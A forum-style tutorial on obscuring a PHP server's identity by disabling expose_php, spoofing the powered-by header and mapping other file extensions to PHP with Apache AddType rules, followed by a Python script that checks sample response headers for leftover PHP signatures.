I must say that hiding or obfuscating is not the most effective form of
security, but it is still effective at keeping a script kiddie confused
about what you are actually running on your server.
As an example: a server may run a vulnerable version of PHP for which a
public exploit has been released on some underground markets. Most of the
time a simple automated exploit is released to help the
“point-and-click hackers” (script kiddies). Now all they have to find out
is which version of PHP you are using and whether it is vulnerable; then
they point the exploit, launch it and own your system. In these cases
obfuscation can really help you a lot.
With PHP obfuscation you can hide PHP, which means you can stop or slow down a hacker attacking your machine.
In this tutorial, we’ll be looking at some of the most popular methods
used by site administrators to hide PHP, so let’s get started.
Editing php.ini file
By default, PHP exposes the fact that it is installed on a server by
adding its signature to the web server header, which can really be
lethal in some cases.
To turn this off, simply go to your PHP installation directory; under
“conf_files” you can find your standard PHP configuration file, named
“php.ini”.
In this file, go to the “Miscellaneous” section and simply set expose_php to Off.
Spoofing
By adding a simple line of code you can actually fool an attacker about what service you are using.
Spoof.php
Note: The header call should be made before you send any data to the client.
Using Some Basic Apache Rules
Most web servers, such as Apache, can be configured with some basic
rules that allow different file types to be parsed as PHP.
E.g.:
A file like index.php gives the attacker a straight clue that the
server is using PHP. But we can use some basic server configuration
to allow an extension like “.mpl” to be parsed as PHP code. The
attacker will then have no clue from the file extension.
For the scope of this tutorial I’ll only be covering some Apache
rules/configurations, but if you need help with some other servers, feel
free to comment or PM me.
The configuration can be added either through a .htaccess file or
directly in the Apache configuration file. Just add the following
set of rules.
Syntax :-
Code:
AddType application/x-httpd-php .extension
Example :-
Code:
AddType application/x-httpd-php .mpl .mp3 .py .asp
Note: only use extensions that are not normally used by the server. For
example, don’t use the .txt extension, as the server will interpret .txt
files as PHP code, and if one contains some PHP, it will be executed.
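To confirm that the three changes above took effect, a response can be checked for the PHP signatures this tutorial sets out to hide. The following is an added example, not code from the original tutorial; the host example.test, the version strings and both sample responses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Matches a PHP product token such as "PHP/5.3.10" (or a bare "PHP").
PHP_TOKEN = re.compile(r"\bPHP(?:/[\d.]+)?", re.IGNORECASE)

def parse_headers(raw):
    """Return (lowercased name, value) pairs from a raw response head."""
    pairs = []
    for line in raw.splitlines()[1:]:      # skip the status line
        if not line.strip():
            break                          # blank line ends the headers
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def php_leaks(url, raw):
    """List the places where a response still reveals PHP."""
    findings = []
    for name, value in parse_headers(raw):
        # expose_php = On shows up in X-Powered-By and the Server signature.
        if name in ("x-powered-by", "server"):
            match = PHP_TOKEN.search(value)
            if match:
                findings.append(f"{name}: discloses {match.group(0)}")
    path = urlsplit(url).path
    if path.lower().endswith(".php"):      # not remapped with AddType
        findings.append(f"url: extension .php in {path}")
    return findings

# Constructed sample: default configuration.
BEFORE_URL = "http://example.test/index.php"
BEFORE = ("HTTP/1.1 200 OK\r\n"
          "Server: Apache/2.2.22 (Unix) PHP/5.3.10\r\n"
          "X-Powered-By: PHP/5.3.10\r\n"
          "Content-Type: text/html\r\n\r\n")

# Constructed sample: expose_php Off, spoofed header, .mpl mapped to PHP.
AFTER_URL = "http://example.test/index.mpl"
AFTER = ("HTTP/1.1 200 OK\r\n"
         "Server: Apache\r\n"
         "X-Powered-By: ASP.NET\r\n"
         "Content-Type: text/html\r\n\r\n")

if __name__ == "__main__":
    for label, url, raw in (("before", BEFORE_URL, BEFORE),
                            ("after", AFTER_URL, AFTER)):
        print(label, php_leaks(url, raw) or "no PHP signature found")
```

An empty result only means these particular signatures are gone; as the conclusion says, it does not make a vulnerable PHP version safe.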
Conclusion
Obfuscation is not the most effective way of securing a server, and most
of the time it doesn’t help, as a professional hacker will already know
these modifications and can easily make out what you are trying to hide.
But obfuscation will really slow down the attacker and will keep away
some script kiddies. It is better to obfuscate than to tell him
what he wants.